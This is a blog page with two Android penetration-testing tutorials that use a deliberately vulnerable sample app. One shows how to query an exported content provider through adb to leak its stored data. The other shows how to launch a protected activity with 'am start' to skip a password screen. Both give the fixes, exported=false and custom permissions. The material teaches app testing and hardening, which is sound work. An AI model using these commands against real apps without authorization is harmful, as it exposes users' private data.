Friday, 25 April 2014

Exploiting Content Provider Leakage

0 comments Posted by srini0x00 on 06:13

Introduction

In the previous article, we discussed how an attacker exploits vulnerable Activity Components and ways to secure them. In this Article, we will discuss "Content Provider Leakage". 

What are content Providers?

As per Google’s inbuilt security model, Application data is private to an application and hence it is not possible for an application to access other application’s data by default. When applications want to share their data with other applications, Content Provider is a way which acts as an interface for sharing data between applications. Content providers use standard insert(), query(), update(), delete() methods to access application data. A special form of URI which starts with “content://” is assigned to each content provider. Any app which knows this URI can insert, update, delete and query data from database of the provider app. 
There may be some cases where content providers might not be implemented for sharing data with other apps, or developer may want to give access only to those apps which have proper permissions. In such cases, if proper security controls are not enforced in the app, that leads to leakage of information.
   
Inbuilt SMS application in Android devices is a classic example of content providers. Any app can query the inbox from the device using it’s URI content://sms/inbox.   But, READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access SMS app’s data.


Prerequisites to follow the steps:

Computer with Android SDK Installed
A Non Rooted mobile device to install the app.

Test Application’s functionality:

Once after downloading the test application, install it in the non rooted android device in order to test and exploit it. 
It can be installed with adb using the following command
adb install <name of the apk>.apk
It has a feature to store data inside the application. When we launch it, it appears as shown in the figure. 
The Goal is to find out if there are any content providers implemented in this app and if YES, We need to check and exploit if they are vulnerable to data leakage.

Topics Involved:

Information gathering
Attacking Vulnerable Content Providers
Securing the applications

Information gathering

Like any other pentest, let’s start with information gathering. We assume that we have the APK file with us. So, decompile the downloaded apk file as shown in the previous article and check AndroidManifest.xml file for any registered content providers. We should also check the smali files for all the URIs used in the app.
Content Providers are generally registered in AndroidManifest.xml file in the following format.
So let’s go ahead and examine the manifest file.
We got one content provider registered in the AndroidManifest.xml file and good news is, it is exported to be accessed by all other apps. 

Attacking Vulnerable Content Providers

This is the most interesting part. Let’s now try to query the content provider we found. If it returns any data, then it is vulnerable. This can be done in multiple ways.
1. Using adb shell
2. Using a Malicious app to query
3. Using Mercury Framework
Using adb:
To query the content provider from adb, the app should be installed on the device. 
Get an adb shell on the device and type the following command to query the content provider. In my case, I am going to query the URI I found in MyProvider.smali file which is extracted by APK tool.

Content –query –uri content://com.isi.contentprovider.MyProvider/udetails
We should now see all the details stored into the app’s db as show in the figure below.




Using a Malicious app to query:
We can even write a malicious app to query the data from its content provider. Following is the code snippet to query the inbox from a mobile device. 

Using Mercury Framework:
The entire process can be carried out using Mercury framework in even more efficient and simple way.
Securing the Applications:
1. Setting android:exported attribute’s value to false:
In the AndroidManifest.xml file of our application, we should add the following attribute to the content provider to be secured. In our case com.isi.contentprovider.MyProvider is the content provider.
If we try to query the content provider whose android:exported value is set to false, it will throw an exception as shown below.
Note: The Default value of android:exported is true for all the applications using API Level lower than 17.
2. Limiting access with custom permissions

We can also impose permission-based restrictions by defining custom permissions for an activity. This is helpful if the developer wants to limit the access to his app’s components to those apps which have permissions.

Other issues with Content Providers:

SQL Injection: If security controls are not properly implemented, content providers can lead to Client Side attacks like SQL Injection. This works similar to traditional SQL Injection attacks.
Path Traversal: This is one more attack which can be carried out, if a content provider is not properly implemented. This is similar to the path traversal attacks on Web Applications. It allows an attacker to traverse and view the local file system. Sensitive files can be transferred from the device to the local machine using an app vulnerable to Path Traversal attack.

Note: You can download the sample application used in this article and follow the steps along with us.
 Download Link: Click Here

Feel free to post your suggestions and Questions.

Exploiting and Securing Application Components

0 comments Posted by srini0x00 on 05:14

Introduction

Mobile Application Security is one of the hottest segments in the security world as security is really a big concern with growing mobile applications. In this Article, we will go through the attacks associated with Android Application Components.

What are Android Application Components?

App components are essential building blocks of an Android App. Every app is built as a combination of some or all of those components which can be invoked individually. There are 4 main components in Android which are explained below.

 Activity: An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, Sending an SMS etc.
Example: Login screen of your facebook app.

Service: A Service can perform long-running operations in the background and does not provide a user interface.
Example: Playing Music

Content Providers: A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: Using content providers, any app can read SMS from inbuilt SMS App’s repository in our device.
*READ_SMS permission must be declared in the app’s AndroidManifest.xml file in order to access SMS app’s data.

Broadcast Receivers: A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug etc. Though most of the broadcast receivers are originated by the system, applications can also announce broadcasts.
This article focuses on demonstrating the methodology to attack and secure vulnerable Activity components of Applications.  

Background:

As shown in the figure below, it has two activities. The first activity takes a password as input. If the user enters the correct password he will be landed in a page which says “Private Area”, else he will get a message “Wrong password”. For test purposes, the password to login is set as “password”. Ideally, the first screen should use an intent and invoke the second screen if a valid password is entered. We need to perform black box testing on this app to see if we can bypass the authentication by directly invoking the welcome screen.

Prerequisites to follow the steps

Computer with Android SDK Installed
A Non Rooted mobile device to install the app.

Topics Involved:

Information gathering
Attacking Vulnerable Activity Components
Securing the applications

Information gathering

1.       Decompile the app with APK tool
2.       Analyze AndroidManifest.xml file for exported Activity components.

Every Android App has a package name and every Activity has its own Class name inside the package. The initial steps are to find out the name of the package and names of the available sensitive activities. Though, there are other methods to get this information, looking at the AndroidManifest.xml is a good approach. We can get the AndroidManifest.xml file by decompiling the application using APKTOOL.
1.       Download APKTOOL from here
2.       Place the test application in the same folder as in APKTOOL
3.       Now, decompile the apk file using the following command as shown in figure.
apktool d testapp.apk
As shown in the figure below, we should now be able to see a new folder named “testapp” with AndroidManifest.xml file inside it.
Now, we need to search for the package name and its activities.
All the activities will be registered in AndroidManifest.xml file using <activity></activity> tags. So, anything inside these tags will be an activity. Looking at the AndroidManifest.xml file, we are able to see two Activity Components and the package name as shown in the figure below.

By examining the above figure, it is clear that we got the following information about the app.
com.isi.testapp is the name of the package.
com.isi.testapp.Welcome could be the activity we are getting after providing the correct password.

Attacking Vulnerable Activity Components

Our job now is to launch Welcome activity without providing any password in the first screen.
We can perform attacks on vulnerable activity components in several ways as mentioned below.
1.       Launching sensitive Activities with Activity Manager Tool.
2.       Using a Malicious App to invoke Activities of other apps.
3.       We can also use Mercury framework for performing these attacks which will be covered in later articles.

Launching sensitive activities with Activity manager tool:

Activity Manager is a tool that comes preinstalled with Android SDK and can be used along with “adb shell”. This tool can be used to launch activities and Services of an application. We can even pass intents using it.
So, let’s begin.
1.       Connect the device to the computer and get a shell on the device using the following command

adb shell

2.       Type in the following command to launch Welcome activity.

am start –n com.isi.testapp/.Welcome

We should now see the welcome screen fired up by am tool without providing the password.

Using a Malicious App to invoke Activities of other apps:

Another way of invoking other application’s activities is to write a malicious app and feed it with the name of the package and activity to be launched. The figure below is a code snippet to launch an activity where in com.isi.testapp.Welcome is the activity to be launched. In our case, malicious app doesn’t require any permission to launch “Welcome” activity of vulnerable app.


Using Mercury framework:

The same attack can be reproduced with mercury framework. We will discuss mercury framework later in this series.

Securing the application components

1.       Setting up android:exported attribute’s value to false

In the AndroidManifest.xml file of our application, we should add the following attribute to the application component to be secured. In our case com.isi.testapp.Welcome is the activity to be secured.
The above code restricts other applications or any system component other than the current app from accessing this Activity.  Only applications that have the same user id as the current app will be able to access this Activity.

1.       Limiting access with custom permissions

android:exported attribute is not the only way to limit an activity's exposure to other applications. We can also impose permission based restrictions by defining custom permissions for an activity. This is helpful if the developer wants to limit the access to his app’s components to those apps which have permissions.
Note: The above security controls are applicable to any other Application component which we discussed in the beginning of the article.

References:

Note: You can download the sample application used in this article and follow the steps along with us.
 Download Link: Click Here

Feel free to post your suggestions and Questions.
 

Recent posts

Recent Comments

Bookmark & Share